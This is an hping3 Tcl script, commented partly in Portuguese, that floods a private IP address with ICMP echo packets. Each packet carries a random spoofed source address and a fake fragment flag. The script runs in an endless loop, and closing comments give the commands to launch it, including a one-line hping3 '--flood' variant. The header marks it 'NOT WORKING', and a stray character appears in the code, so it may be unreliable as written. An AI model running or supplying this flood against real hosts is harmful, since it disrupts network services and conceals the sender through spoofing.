# Hping3 ICMP Fake Fragment Flood (no real fragmentation)
# NOT WORKING

set dst_ip "192.168.100.2"
set count 0
s
proc random_ip {} {
    return "[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}]"
}

while {1} {
    set saddr [random_ip]

    # fragoff=64 
    # mf=1 "More fragments" (mesmo sem fragmentação real)
    # id random
    set frag_id [expr {int(rand()*65535)}]

    set pkt "ip(saddr=$saddr,daddr=$dst_ip,ttl=64,id=$frag_id,fragoff=64,mf=1)+icmp(type=8,code=0)"

    hping send $pkt
    incr count

    if {[expr {$count % 1000}] == 0} {
        puts "$count ICMP Fake-Fragment packets sent..."
    }
}

# Comandos:
# sudo hping3 exec icmp_fake_frag.htcl
# sudo hping3 -1 192.168.100.2 -x -g 64 --flood
